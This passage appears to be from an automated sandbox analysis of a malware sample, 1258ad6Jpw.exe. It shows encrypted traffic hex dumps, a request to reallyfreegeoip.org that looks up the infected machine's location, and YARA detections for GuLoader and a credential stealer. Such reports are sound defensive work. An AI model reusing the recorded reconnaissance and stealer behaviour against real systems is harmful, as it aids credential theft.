                                                                                2025-03-07 21:44:11 UTC1378INData Raw: d9 74 37 25 24 3c 2c c5 6e b2 8d 84 d3 17 05 3a f6 0d 20 8f ca 88 81 4a 22 c9 02 33 74 e3 ae fd b2 69 8e bd 50 5b 4b f6 21 9f 1c 2f dd 37 61 f2 f1 ec 94 79 0e a1 15 c6 bd 0e 67 60 3c 81 59 e4 7f 48 90 dc 30 b8 e5 25 8a e2 47 45 71 d5 d3 f0 1b 36 28 2f 20 a6 75 95 e8 11 57 91 93 2f 24 95 be 1a ea 9f f7 82 9d a8 78 cb d4 4f bc 9b 5e f1 15 cd b8 31 b2 df b2 d9 f3 71 1c ee 68 88 cc ce fc ae 62 3b f9 e9 55 8a f9 27 b5 8b 17 a6 e0 68 d4 c5 2b 79 12 8a e0 60 85 16 ef a4 3d f4 fb b7 1b 09 9d 18 fc d4 c5 e3 2b 64 73 0b f2 5b 5b c4 5a 65 9b 4e ee cd 0d 05 8a e0 bf f2 06 c2 c1 e9 12 35 b6 2d f3 59 11 0b 2a 89 88 2f 08 d7 af 15 2b eb 7d 93 30 a6 73 04 5f 4a c1 e4 04 9d d4 65 05 c9 c1 9c d3 b6 35 6c ed b5 f2 45 da 31 20 32 4f 85 27 a3 b6 b3 c6 44 11 88 ca 31 70 7c 8b
                                                                                Data Ascii: t7%$<,n: J"3tiP[K!/7ayg`<YH0%GEq6(/ uW/$xO^1qhb;U'h+y`=+ds[[ZeN5-Y*/+}0s_Je5lE1 2O'D1p|
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: 59 e0 ab 70 a5 6a 3b db 93 4d e5 e5 2f 42 bc 64 e9 f1 b0 4e 48 e3 21 86 a0 f6 80 3d 86 6e 01 ca 6e c2 b0 69 32 fa 8e f0 1a 63 e4 ba 66 ee 82 80 4c 07 5e 09 61 6f 64 9c 2b 3a 47 a2 68 5d c1 2f 1c 22 cd f6 4c a3 f0 0a 9e b7 35 1b 29 09 d0 e7 f7 20 b6 7b 33 82 08 f0 7a a8 ac 52 10 57 08 f0 ce 3c 31 5a a5 a3 b8 45 4c 57 ea da be 49 ff ab ad 0c cb 71 81 50 01 1c 14 76 26 fc e5 c4 94 69 55 ac 66 db cb ff 99 f9 bb e8 d1 24 df 6c 86 0b a3 77 76 95 e1 46 2b f1 0e 5b 5b f1 7c 82 55 22 5c f1 40 ff 08 91 5f 4a f1 a0 4f 68 43 25 7c 60 57 d3 a9 e4 26 49 93 68 1f 91 2b 1d c2 d6 16 a4 d2 ae 33 a8 ba 17 49 c6 2d 48 b5 5b da 52 50 d0 79 bd 48 6c dc e1 39 e3 36 ef c6 c5 20 f9 b1 92 03 51 8f ea 79 41 08 fc 86 e7 6e e4 55 04 56 da 03 90 34 fb b0 0f 44 bb be 15 86 bb b3 47 d1
                                                                                Data Ascii: Ypj;M/BdNH!=nni2cfL^aod+:Gh]/"L5) {3zRW<1ZELWIqPv&iUf$lwvF+[[|U"\@_JOhC%|`W&Ih+3I-H[RPyHl96 QyAnUV4DG
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: f3 85 c9 39 f7 66 8e 8b f8 7c e2 da af 51 39 cb 13 81 1c 16 1f 3e 60 bc e2 1b 32 62 32 b7 5a c3 fd 7a db f1 0a fb 80 78 35 bc 8d 15 eb 6f d3 5d ed 63 ea 53 ed 4f 45 28 f3 8c 19 bf 99 81 80 58 0a 9d 8b 16 25 dd bf 00 2e 17 f0 d4 ca 0b ed 31 b5 bc bb 52 f7 38 13 b8 12 21 9f 50 9b fc ce b7 cb 4d 76 43 4f cb 82 34 a0 a3 35 4a de 01 31 65 ee b5 97 f5 82 f0 be c6 15 ed e9 e4 33 39 12 a4 58 dd fb 14 e0 fc 65 9f 3a 0f 11 5c db d8 79 00 ef af 95 87 80 83 c6 ee 80 3e d2 0f 56 de 1c 10 ff f3 ce 21 5c 09 09 0d 9a 1b e5 d1 50 f1 f6 c9 1d f0 a6 75 cd e6 5f 98 28 f7 d9 4e 60 0d 00 80 01 02 ae 3e 1f c2 cf 0c 13 3e c2 d1 e1 36 23 1f 2b b6 26 b3 70 27 a9 f4 a1 5a cf ac 88 40 33 5a e6 d8 d4 46 f9 65 c8 ce f1 8d 56 32 e6 cf 3b 15 7b 18 03 0f 4a 07 47 17 10 2c cb ba a3 39 79
                                                                                Data Ascii: 9f|Q9>`2b2Zzx5o]cSOE(X%.1R8!PMvCO45J1e39Xe:\y>V!\Pu_(N`>>6#+&p'Z@3ZFeV2;{JG,9y
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: bd ad 9d b0 95 cf 50 9c 2b 12 d3 b3 a4 01 ae 90 ce 90 40 f6 b3 91 0b ae 08 12 d8 85 08 44 ee 00 b4 01 59 23 c3 76 d8 a5 58 9b 8b 37 9d 54 67 0b 09 04 61 a6 ea 73 40 c7 b0 1c 64 b1 2a 6a 2c f4 14 07 04 ce ef 50 07 fc 00 f4 49 9b a0 a0 df 1e 13 04 58 4c f8 26 8c 52 79 bb 6d 08 07 c5 a3 09 97 d6 c6 a1 04 76 4a 8b ae d1 75 42 cd 85 d3 6d ce aa bf 5a 35 08 cc b6 7b 13 c9 bf 1a 74 d3 40 21 1a 6c d5 17 ac 8a 44 3c 90 ef 90 48 09 13 75 8a b8 e1 2f 39 26 b7 3f e0 a2 68 3d 3e e4 be 3b 45 8a c0 ea 06 2c c4 5c 32 aa ae be 0d 05 ab 10 01 04 f9 26 ad b4 ca ec b1 79 c1 d1 1a 7f 5b 39 8d 84 ae 54 15 e3 20 4b bd 95 88 25 ae 64 97 6c d1 92 0e 84 f0 75 78 57 92 5c 9f 50 2a 09 fb cc b0 c4 dc f2 2c c5 2d db 68 d9 53 c2 0f 98 3d 94 74 7d 72 c5 7e 08 e4 8f b9 76 fd f3 25 e0 d7
                                                                                Data Ascii: P+@DY#vX7Tgas@d*j,PIXL&RymvJuBmZ5{t@!lD<Hu/9&?h=>;E,\2&y[9T K%dluxW\P*,-hS=t}r~v%
                                                                                2025-03-07 21:44:11 UTC1378INData Raw: 5d 16 2c ed 0a 05 be 4e 83 90 58 20 c6 13 27 e0 e8 71 fd 9a c2 58 ac 53 42 4e 65 89 93 00 04 bf 58 a5 f9 e0 fe ea 2c 1f b5 8b ff 08 1f 73 f2 f5 1a 59 f2 6a 31 63 cd a4 e0 36 0d 0b e8 54 58 75 3c f8 27 1e 44 c0 02 6a d6 63 b7 62 00 43 8c 53 c2 33 db b9 07 e8 a2 4c c8 8a 0e 47 cd fe 4e 8a bd 2f 2d 27 cd c8 93 a7 c8 bb 6a d6 6b 78 d5 12 70 bc 6c d3 c5 c5 24 5b bc 59 d0 44 32 b5 f1 a3 7d fa 72 d6 4b 0a 72 6a 86 c0 60 e3 be ec 05 3b de f1 a4 0d 47 94 18 ee d1 d4 ee 32 2e 73 1a f8 d9 26 7a 41 61 eb 66 b5 ca 1a d9 92 f1 23 ac 17 c4 fe 05 eb e2 b0 2d f3 8d 17 d0 03 b7 81 3c 07 d5 a4 39 0a ad 6e 97 3a 40 ae 04 75 0b dd 96 dc 86 d4 15 1b a9 3b 9c d3 eb 33 44 16 df f3 4f f2 dd 20 32 45 d2 21 b2 b1 c7 0b 40 11 fe d8 39 5b 0c 9a ba 18 32 fb ba e9 f1 54 f1 f4 6d cc 49
                                                                                Data Ascii: ],NX 'qXSBNeX,sYj1c6TXu<'DjcbCS3LGN/-'jkxpl$[YD2}rKrj`;G2.s&zAaf#-<9n:@u;3DO 2E!@9[2TmI


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.849692104.21.16.14434664C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-03-07 21:44:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                Host: reallyfreegeoip.org
                                                                                Connection: Keep-Alive
                                                                                2025-03-07 21:44:15 UTC861INHTTP/1.1 200 OK
                                                                                Date: Fri, 07 Mar 2025 21:44:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 362
                                                                                Connection: close
                                                                                Age: 145236
                                                                                Cache-Control: max-age=31536000
                                                                                cf-cache-status: HIT
                                                                                last-modified: Thu, 06 Mar 2025 05:23:38 GMT
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mKoM1%2BijNTBLEx%2F1I7x5fZc5sJstm6zzd37S5fQwYM6ZIX8gRF3lZpiJ8Ip%2BfPpcNUULob12kshuO%2FvXbawAMx%2FIUWnHE362m2zy0g02kRgr3KkUnFATcsNy%2FHYRYcR87txe7B6t"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 91cd45e51ad8e5db-ORD
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=10278&min_rtt=9626&rtt_var=3204&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=291734&cwnd=252&unsent_bytes=0&cid=ed364a819c81701c&ts=455&x=0"
                                                                                2025-03-07 21:44:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:16:43:12
                                                                                Start date:07/03/2025
                                                                                Path:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\1258ad6Jpw.exe"
                                                                                Imagebase:0x400000
                                                                                File size:1'113'012 bytes
                                                                                MD5 hash:8B0BD4C6A70334229181F7F0563E154B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1239205290.0000000003586000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:16:43:50
                                                                                Start date:07/03/2025
                                                                                Path:C:\Users\user\Desktop\1258ad6Jpw.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\1258ad6Jpw.exe"
                                                                                Imagebase:0x400000
                                                                                File size:1'113'012 bytes
                                                                                MD5 hash:8B0BD4C6A70334229181F7F0563E154B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2134875649.0000000034B36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Reset < >